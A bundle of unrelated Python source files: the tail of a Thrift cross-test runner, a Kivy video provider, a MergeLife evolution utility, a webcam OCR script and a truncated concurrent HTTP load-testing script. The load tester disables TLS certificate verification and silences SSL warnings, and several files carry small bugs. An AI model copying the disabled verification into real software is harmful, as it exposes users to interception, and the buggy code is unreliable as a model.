if "extra_args" in client:
client_extra_args = client["extra_args"]
if protocol in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"" + protocol + "\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_" + protocol + "_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, protocol, transport, 9090, 0, sock)
if ret != None:
failed += 1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'binary' and 'accel' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"accel-binary\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_accel-binary_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'accel', transport, 9090, 0, sock)
if ret != None:
failed += 1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport , getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
if protocol == 'accel' and 'binary' in client["protocols"]:
if transport in client["transports"]:
if sock in client["sockets"]:
if count != 0:
results_json.write(",\n")
count = 1
results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"binary-accel\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
test_name = server_lib + "_" + client_lib + "_binary-accel_" + transport + "_" + sock
ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'binary', transport, 9090, 0, sock)
if ret != None:
failed += 1
print "Error: %s" % ret
print "Using"
print (' Server: %s --protocol=%s --transport=%s %s %s'
% (server_executable, protocol, transport + sock, getSocketArgs(sock), ' '.join(server_extra_args)))
print (' Client: %s --protocol=%s --transport=%s %s %s'
% (client_executable, protocol, transport + sock, getSocketArgs(sock), ''.join(client_extra_args)))
results_json.write("\t\t\"failure\",\n")
else:
results_json.write("\t\t\"success\",\n")
results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
test_count += 1
results_json.write("\n]")
results_json.flush()
results_json.close()
print '%s failed of %s tests in total' % (failed, test_count) |
video_ffpyplayer.py | '''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplyaer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here's some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL.
Now, you should a ffmpeg and sdl directory. In each, you should have a include,
bin, and lib directory, where e.g. for Windows, lib contains the .dll.a files,
while bin contains the actual dlls. The include directory holds the headers.
The bin directory is only needed if the shared libraries are not already on
the path. In the environment define FFMPEG_ROOT and SDL_ROOT, each pointing to
the ffmpeg, and SDL directories, respectively. (If you're using SDL2,
the include directory will contain a directory called SDL2, which then holds
the headers).
Once defined, download the ffpyplayer git and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
..Note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__method of VideoFFPy
is not called. Because of this the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main threads exists it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive hanging kivy. What this
means is that you have to be sure to delete the MediaPlayer object before
kivy exits by setting it to None.
'''
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size, colorfmt='rgba')
# XXX FIXME
#self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader for
# buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
s = time.clock()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX if will fail later then?
if time.clock() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
# we got all the informations, now, get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
ffplayer.seek(
vals[-1] * ffplayer.get_metadata()['duration'],
relative=False)
self._next_frame = None
t1 = time.time()
frame, val = ffplayer.get_frame()
t2 = time.time()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent):
if self._ffplayer is None:
return
self._seek_queue.append(percent)
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
ml_utility.py | import argparse
import json
import multiprocessing as mp
import operator
import time
import sys
import mergelife
import ml_evolve as ev
import numpy as np
bestGenome = None
evalCount = 0
startTime = 0
timeLastUpdate = 0
totalEvalCount = 0
runCount = 1
noImprovement = 0
waitingCount = 0
population = []
def subprocessScore(inputQueue, outputQueue):
while True:
genome = inputQueue.get()
rule_str = genome['rule']
width = config['config']['cols']
height = config['config']['rows']
ml_inst = mergelife.new_ml_instance(height, width, rule_str)
result = mergelife.objective_function(ml_inst, config['config']['evalCycles'], config['objective'])
outputQueue.put({'rule': rule_str, 'score': result['score'], 'run': genome['run']})
def report(config, inputQueue, genome):
global bestGenome, evalCount, totalEvalCount, timeLastUpdate, startTime, runCount, noImprovement, population
requestStop = False
evalCount += 1
totalEvalCount += 1
if bestGenome is None or genome['score'] > bestGenome['score']:
bestGenome = genome
else:
noImprovement += 1
if noImprovement > config['config']['patience']:
requestStop = True
now = time.time()
if requestStop or (now - timeLastUpdate > 60):
elapsed = now - startTime
perSec = totalEvalCount / elapsed
perMin = int(perSec * 60.0)
print("Run #{}, Eval #{}: {}, evals/min={}".format(runCount, evalCount, bestGenome, perMin))
timeLastUpdate = now
if requestStop:
print("No improvement for {}, stopping...".format(config['config']['patience']))
if bestGenome['score'] > config['config']['scoreThreshold']:
render(config, bestGenome['rule'])
noImprovement = 0
runCount += 1
evalCount = 0
population = []
bestGenome = None
randomPopulation(config, inputQueue)
def randomPopulation(config, queue):
global waitingCount
for i in range(config['config']['populationSize']):
queue.put({'score': None, 'rule': mergelife.random_update_rule(), 'run': runCount})
waitingCount += config['config']['populationSize']
def evolve(config):
global timeLastUpdate, waitingCount, startTime
cpus = mp.cpu_count()
print("Forking for {}".format(cpus))
processes = []
startTime = time.time()
timeLastUpdate = startTime
cycles = config['config']['evalCycles']
inputQueue = mp.Queue()
outputQueue = mp.Queue()
for i in range(cpus):
# parent_conn, child_conn = mp.Pipe()
# p = mp.Process(target=subprocessScore, args=(parent_conn,))
p = mp.Process(target=subprocessScore, args=(inputQueue, outputQueue,))
p.start()
processes.append({'process': p})
randomPopulation(config, inputQueue)
population = []
while True:
g = outputQueue.get()
waitingCount -= 1
if g['run'] == runCount:
if len(population) < config['config']['populationSize']:
population.append(g)
report(config, inputQueue, g)
else:
target_idx = ev.select_tournament(population, cycles, operator.lt)
population[target_idx] = g
report(config, inputQueue, g)
if waitingCount < cpus * 2:
if np.random.uniform() < config['config']['crossover']:
# Crossover
parent1_idx = ev.select_tournament(population, cycles, operator.gt)
parent2_idx = parent1_idx
while parent1_idx == parent2_idx:
parent2_idx = ev.select_tournament(population, cycles, operator.gt)
parent1 = population[parent1_idx]['rule']
parent2 = population[parent2_idx]['rule']
if parent1 != parent2:
child1, child2 = ev.crossover(parent1, parent2, cycles)
inputQueue.put({'rule': child1, 'score': None, 'run': runCount})
inputQueue.put({'rule': child2, 'score': None, 'run': runCount})
waitingCount += 2
else:
# Mutate
parent_idx = ev.select_tournament(population, cycles, operator.gt)
parent = population[parent_idx]['rule']
child = ev.mutate(parent)
inputQueue.put({'rule': child, 'score': None, 'run': runCount})
waitingCount += 1
for p in processes:
p['process'].join()
def render(config, ruleText):
width = config['config']['cols']
height = config['config']['rows']
steps = config['config']['renderSteps']
ml_inst = mergelife.new_ml_instance(height, width, ruleText)
for i in range(steps):
mergelife.update_step(ml_inst)
filename = ruleText + ".png"
mergelife.save_image(ml_inst, filename)
print("Saved {}".format(filename))
def score(config, ruleText):
width = config['config']['cols']
height = config['config']['rows']
ml_inst = mergelife.new_ml_instance(height, width, ruleText)
result = mergelife.objective_function(ml_inst, config['config']['evalCycles'], config['objective'], True)
print("Final result: {}".format(result['score']))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Mergelife Utility')
parser.add_argument('--rows', nargs=1, type=int, help="the number of rows in the MergeLife grid")
parser.add_argument('--cols', nargs=1, type=int, help="the number of cols in the MergeLife grid")
parser.add_argument('--renderSteps', nargs=1, type=int, help="the number of steps to render")
parser.add_argument('--zoom', nargs=1, type=int, help="the pixel size for rendering")
parser.add_argument('--config', nargs=1, type=str, help="the path to a config file")
parser.add_argument('command', nargs=argparse.REMAINDER, metavar='command', type=str, choices=['evolve', 'score', 'render'],
help='an integer for the accumulator')
args = parser.parse_args()
if args.config is None:
config = {'config': {}}
else:
with open(args.config[0]) as f:
config = json.load(f)
# Override with command line params, if they are there
if args.rows is not None:
config['config']['rows'] = args.rows[0]
if args.cols is not None:
config['config']['cols'] = args.cols[0]
if args.renderSteps is not None:
config['config']['renderSteps'] = args.renderSteps[0]
if args.config is not None:
config['config']['config'] = args.config[0]
if args.zoom is not None:
config['config']['zoom'] = args.zoom[0]
# Default values
if 'cols' not in config['config']:
config['config']['cols'] = 100
if 'rows' not in config['config']:
config['config']['rows'] = 100
if 'evalCycles' not in config['config']:
config['config']['renderSteps'] = 250
if 'zoom' not in config['config']:
config['config']['cols'] = 5
if args.command[0] == 'render':
if len(args.command)<2:
print("Must specify what rule hex-code you wish to render.")
sys.exit(0)
else:
render(config, args.command[1])
elif args.command[0] == 'score':
score(config, args.command[1])
elif args.command[0] == 'evolve':
evolve(config)
|
fianl_verison.py |
##load model
import cv2
import numpy as np
import re
import threading
from multiprocessing import Queue #使用多核心的模組 Queue
import logging
import time
from PIL import Image, ImageDraw
from keras.preprocessing import image
from keras.applications.vgg16 import preprocess_input
import cfg
from network import East
from preprocess import resize_image
from nms import nms
import os
from config import *
from apphelper.image import union_rbox,adjust_box_to_origin,base64_to_PIL
from application import trainTicket,idcard
if yoloTextFlag =='keras' or AngleModelFlag=='tf' or ocrFlag=='keras':
if GPU:
os.environ["CUDA_VISIBLE_DEVICES"] = str(GPUID)
import tensorflow as tf
from keras import backend as K
config = tf.ConfigProto()
config.gpu_options.allocator_type = 'BFC'
config.gpu_options.per_process_gpu_memory_fraction = 0.3 ## GPU最大占用量
config.gpu_options.allow_growth = True ##GPU是否可动态增加
K.set_session(tf.Session(config=config))
K.get_session().run(tf.global_variables_initializer())
else:
##CPU启动
os.environ["CUDA_VISIBLE_DEVICES"] = ''
if yoloTextFlag=='opencv':
scale,maxScale = IMGSIZE
from text.opencv_dnn_detect import text_detect
elif yoloTextFlag=='darknet':
scale,maxScale = IMGSIZE
from text.darknet_detect import text_detect
elif yoloTextFlag=='keras':
scale,maxScale = IMGSIZE[0],2048
from text.keras_detect import text_detect
else:
print( "err,text engine in keras\opencv\darknet")
from text.opencv_dnn_detect import angle_detect
if ocr_redis:
##多任务并发识别
from apphelper.redisbase import redisDataBase
ocr = redisDataBase().put_values
else:
from crnn.keys import alphabetChinese,alphabetEnglish
if ocrFlag=='keras':
from crnn.network_keras import CRNN
if chineseModel:
alphabet = alphabetChinese
if LSTMFLAG:
ocrModel = ocrModelKerasLstm
else:
ocrModel = ocrModelKerasDense
else:
ocrModel = ocrModelKerasEng
alphabet = alphabetEnglish
LSTMFLAG = True
elif ocrFlag=='torch':
from crnn.network_torch import CRNN
if chineseModel:
alphabet = alphabetChinese
if LSTMFLAG:
ocrModel = ocrModelTorchLstm
else:
ocrModel = ocrModelTorchDense
else:
ocrModel = ocrModelTorchEng
alphabet = alphabetEnglish
LSTMFLAG = True
elif ocrFlag=='opencv':
from crnn.network_dnn import CRNN
ocrModel = ocrModelOpencv
alphabet = alphabetChinese
else:
print( "err,ocr engine in keras\opencv\darknet")
nclass = len(alphabet)+1
if ocrFlag=='opencv':
crnn = CRNN(alphabet=alphabet)
else:
crnn = CRNN( 32, 1, nclass, 256, leakyRelu=False,lstmFlag=LSTMFLAG,GPU=GPU,alphabet=alphabet)
if os.path.exists(ocrModel):
crnn.load_weights(ocrModel)
else:
print("download model or tranform model with tools!")
ocr = crnn.predict_job
from main import TextOcrModel
model = TextOcrModel(ocr,text_detect,angle_detect)
#def predict(img):
#image = cv2.putText(img,digital_num,(50,50),cv2.FONT_HERSHEY_COMPLEX,2,(0,0,255),10)
#cv2.imshow('frame2', image)
def t2_start(q,img) :
thread2 = threading.Thread(target=T2_job, args=(q,img))
thread2.start()
def T2_job(q,img):
print('T2 start')
t = time.time()
if img is not None:
img = np.array(img)
#H,W = img.shape[:2]
## predict
result,angle= model.model(img,
scale=scale,
maxScale=maxScale,
detectAngle=True,##是否进行文字方向检测,通过web传参控制
MAX_HORIZONTAL_GAP=100,##字符之间的最大间隔,用于文本行的合并
MIN_V_OVERLAPS=0.6,
MIN_SIZE_SIM=0.6,
TEXT_PROPOSALS_MIN_SCORE=0.1,
TEXT_PROPOSALS_NMS_THRESH=0.3,
TEXT_LINE_NMS_THRESH = 0.99,##文本行之间测iou值
LINE_MIN_SCORE=0.1,
leftAdjustAlph=0.01,##对检测的文本行进行向左延伸
rightAdjustAlph=0.01,##对检测的文本行进行向右延伸
)
p = re.compile(r'^[A-z]+[0-9]*$')
result = union_rbox(result,0.2)
print(result)
res = [{'text':x['text'],
'name':str(i),
'box':{'cx':x['cx'],
'cy':x['cy'],
'w':x['w'],
'h':x['h'],
'angle':x['degree']}
} for i,x in enumerate(result) if re.match(p,x['text'])]
#print("res:" + str(res))
logging.basicConfig(filename='logging.txt',
filemode='w',
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.DEBUG)
logging.info("res:" + str(res))
if res != []:
digital_re = re.compile(r'\d{8}')
digital_num = re.findall(digital_re,res[0]['text'])
q.put(digital_num)
#pre_enable=1
print('T2 finish')
timeTake = time.time()-t
logging.info("Execution time: " + str(timeTake))
east = East()
east_detect = east.east_network()
east_detect.summary()
east_detect.load_weights(cfg.model_weights_path)
def sigmoid(x):
"""`y = 1 / (1 + exp(-x))`"""
return 1 / (1 + np.exp(-x))
def crop_rectangle(img, geo):
rect = cv2.minAreaRect(geo.astype(int))
center, size, angle = rect[0], rect[1], rect[2]
print(angle)
if(angle > -45):
center = tuple(map(int, center))
size = tuple([int(rect[1][0] + 100), int(rect[1][1] + 100)])
height, width = img.shape[0], img.shape[1]
M = cv2.getRotationMatrix2D(center, angle, 1)
img_rot = cv2.warpAffine(img, M, (width, height))
img_crop = cv2.getRectSubPix(img_rot, size, center)
else:
center = tuple(map(int, center))
size = tuple([int(rect[1][1] + 100), int(rect[1][0]) + 100])
angle -= 270
height, width = img.shape[0], img.shape[1]
M = cv2.getRotationMatrix2D(center, angle, 1)
img_rot = cv2.warpAffine(img, M, (width, height))
img_crop = cv2.getRectSubPix(img_rot, size, center)
return img_crop
def predict(east_detect, img_path, pixel_threshold, quiet=False):
img = image.load_img(img_path)
d_wight, d_height = resize_image(img, cfg.image_size)
img = img.resize((d_wight, d_height), Image.NEAREST).convert('RGB')
img = image.img_to_array(img)
img = preprocess_input(img, mode='tf')
x = np.expand_dims(img, axis=0)
y = east_detect.predict(x)
y = np.squeeze(y, axis=0)
y[:, :, :3] = sigmoid(y[:, :, :3])
cond = np.greater_equal(y[:, :, 0], pixel_threshold)
activation_pixels = np.where(cond)
quad_scores, quad_after_nms = nms(y, activation_pixels)
with Image.open(img_path) as im:
im_array = image.img_to_array(im.convert('RGB'))
d_wight, d_height = resize_image(im, cfg.image_size)
scale_ratio_w = d_wight / im.width
scale_ratio_h = d_height / im.height
im = im.resize((d_wight, d_height), Image.NEAREST).convert('RGB')
quad_im = im.copy()
quad_draw = ImageDraw.Draw(quad_im)
txt_items = []
flag = False
for score, geo, s in zip(quad_scores, quad_after_nms,
range(len(quad_scores))):
if np.amin(score) > 0:
flag = True
quad_draw.line([tuple(geo[0]),
tuple(geo[1]),
tuple(geo[2]),
tuple(geo[3]),
tuple(geo[0])], width=2, fill='blue')
rescaled_geo = geo / [scale_ratio_w, scale_ratio_h]
rescaled_geo_list = np.reshape(rescaled_geo, (8,)).tolist()
txt_item = ','.join(map(str, rescaled_geo_list))
txt_items.append(txt_item + '\n')
if cfg.detection_box_crop:
img_crop = crop_rectangle(im_array, rescaled_geo)
cv2.imwrite(os.path.join('output_crop', img_path.split('/')[-1].split('.')[0] + '.jpg'),cv2.cvtColor(img_crop, cv2.COLOR_BGR2RGB))
elif not quiet:
print('quad invalid with vertex num less then 4.')
if flag:
quad_im.save(os.path.join('output', img_path.split('/')[-1].split('.')[0] + '_predict.jpg'))
if cfg.predict_write2txt and len(txt_items) > 0:
with open(os.path.join("output_txt", img_path.split('/')[-1].split('.')[0] + '.txt'), 'w') as f_txt:
f_txt.writelines(txt_items)
def predict_num(frame):
cv2.imwrite("output.jpg", frame)
predict(east_detect, "output.jpg", cfg.pixel_threshold)
def main(q):
cap = cv2.VideoCapture(0)
if not cap.isOpened():
print("Cannot open camera")
exit()
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
frame = cv2.resize(frame, (640, 480), interpolation = cv2.INTER_LINEAR)
# if frame is read correctly ret is True
if not ret:
print("Can't receive frame (stream end?). Exiting ...")
break
# color to gray
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# 顯示圖片
cv2.imwrite("output.jpg", frame)
predict(east_detect, "output.jpg", cfg.pixel_threshold)
#im = Image.open("output.jpg")
if os.path.exists(r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg'):
img = cv2.imread(r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg')
#os.remove(r'C:\Users\test\Desktop\final_presentation\output_crop\output.jpg')
t2_start(q,img)
global res_before,res_new
while(q.empty()==False):
res_before=q.get()
#cv2.putText(img, "result = "+str(label_dict[q.get()]), (0,25), 0, 1, (0,255,0),2)
print(res_before)
break
#cv2.imshow('frame', frame)
#img = frame
if(res_new!=res_before):
res_new=res_before
#t3_start(client)
else:
cv2.putText(frame, "result = "+ str(res_new), (0,25), 0, 1, (0,255,0),2)
cv2.imshow("frame",frame)
# 按下 q 鍵離開迴圈
if cv2.waitKey(1) == ord('q'):
#cv2.imwrite('output.jpg', frame)
break
# 釋放該攝影機裝置
cap.release()
cv2.destroyAllWindows()
#thread.join()
if __name__ == '__main__':
try:
os.remove(r'C:\Users\test\Desktop\final_presentation\output\output_predict.jpg')
except:
print("not exist")
q = Queue()
res_before = None
res_new = None
#frame = None
main(q)
|
spawn_api_requests.py | #!/usr/bin/env python
import requests
import numpy as np
from multiprocessing import Process, Manager, Lock
import traceback
import signal
import sys
import argparse
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
###############################################################################
# Simple script for testing site reponse time against concurrent requests #
# Developed with Python 2.7.6. Tested on OS X and Linux #
# Example Usage: #
# python spawn_api_requests.py --concurrency 15 #
###############################################################################
def signal_term_handler(signal, frame):
# Catch SIGTERM from User
# If this fails, and processes are left running, execute:
# kill -9 `ps -ef | grep -i python | grep -i spawn_api_requests | head -n1 | awk '{ print $2 }'`
print("Script forced to aborted by user")
sys.exit()
def status(code):
# Print Colorized Status Codes (unix OSes only)
# 2XX HTTP Response (Green)
if str(code)[0] == "2":
return "\033[92m" + str(code) + "\033[0m"
# 4XX/5XX HTTP Response (Red)
elif str(code)[0] in ["4", "5"]:
return "\033[91m" + str(code) + "\033[0m"
# Other HTTP Response (Yellow)
else:
return "\033[93m" + str(code) + "\033[0m"
def safe_print(string, lock):
# Threadsafe version of print
# print() is threadsafe by default, however newlines are not
lock.acquire()
print(string)
lock.release()
# Method to authenticate and send requests for each worker
def send_http_request(results, times, pages, authentication, timeout, lock, number=1):
# Optional authentication step
if authentication['api_authentication']['enabled']:
try:
print("\nAuthenticating thread number %s" %(number))
request_type = authentication['api_authentication']['request_type']
login_url = "%s://%s/%s" %(url_details['protocol'], url_details['url'], authentication['api_authentication']['endpoint'])
header = {'Content-Type': authentication['api_authentication']['payload_format']}
payload = authentication['api_authentication']['payload_as_string']
r = requests.request(request_type, url=login_url, headers=header, data=payload, verify=False, allow_redirects=True)
except Exception as e:
lock.acquire()
print("Failed to send Authentication Request. Failure Response:")
traceback.print_exc()
lock.relase()
sys.exit()
if r.status_code in [200, 201]:
cookies = dict(r.cookies)
safe_print("Authentication Succeeded\n\tSession Cookie: %s" % (dict(cookies)), lock)
if sum(1 for _ in r.cookies) == 0:
safe_print("\t\033[91mWarning:\033[0m Received 2XX status from server, but no Session Cookie was readable. You're probably NOT authenticated", lock)
else:
safe_print("Authentication Failure:\n\tStatus: %s\n\tResponse: %s" %(status(r.status_code), r.text), lock)
sys.exit()
else:
cookies = {}
# After authentication, traverse through each page
try:
for page in url_details['endpoints']:
current_url = "%s://%s/%s" %(url_details['protocol'], url_details['url'], page)
try:
r = requests.request( 'get',
url=current_url,
cookies=cookies,
verify=False,
allow_redirects=True,
timeout=(timeout['connect'], timeout['read']))
times.append(r.elapsed.microseconds)
results["Valid Response"] += 1
except requests.exceptions.ReadTimeout as e:
safe_print("Request Thread %s:\n\t\033[91mRead Timeout!\033[0m No server response in %s seconds" %(number, timeout['read']), lock)
results["Read Timeout"] += 1
return
except requests.exceptions.ConnectTimeout as e:
lock.acquire()
safe_print("Request Thread %s:\n\t\033[91mConnect Timeout!\033[0m No server response in %s seconds" %(number, timeout['connect']), lock)
lock.release()
results["Connect Timeout"] += 1
return
except requests.exceptions.ConnectionError as e:
safe_print("Request Thread %s:\n\t\033[91mConnection Error!\033[0m %s" %(number, e), lock)
results["Connection Error"] += 1
return
except Exception as e:
safe_print("Request Thread %s:\n\t\033[91mUnexpected Error!\033[0m %s" %(number, e), lock)
return
if not r.status_code == 200:
safe_print("Failed to get page:\n\tURL: %s\n\tStatus: %s" %(current_url, status(r.status_code)), lock)
else:
if r.history:
for redirect in r.history:
safe_print("Request Thread %s:\n\tStatus: %s\n\tTime: %s\n\tRedirects:\n\t\t%s : %s" %( number, status(r.status_code), float(r.elapsed.microseconds) / 1000000,
status(redirect.status_code), redirect.url),
lock)
safe_print("\tFinal Destination:\n\t\t%s : %s" %(status(r.status_code), r.url), lock)
else:
safe_print("Request Thread %s:\n\tURL: %s\n\tStatus: %s\n\tTime: %s" %(number, r.url, status(r.status_code), float(r.elapsed.microseconds) / 1000000), lock)
except KeyboardInterrupt:
sys.exit()
if __name__ == "__main__":
# Disable all SSL warnings
try:
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
except:
pass
# Catch Sigterm from User
signal.signal(signal.SIGTERM, signal_term_handler)
# Globals
subprocesses = []
count = 0
manager = Manager()
lock = manager.Lock()
times = manager.list()
results = manager.dict()
results["Valid Response"] = 0
results["Connection Error"] = 0
results["Read Timeout"] = 0
results["Connect Timeout"] = 0
# Import list of URLs:
# protocol, base url, and list of endpoints
with open('config/url_list.json', 'r') as url_endpoints:
url_details = json.load(url_endpoints)
# Import Authentication Details:
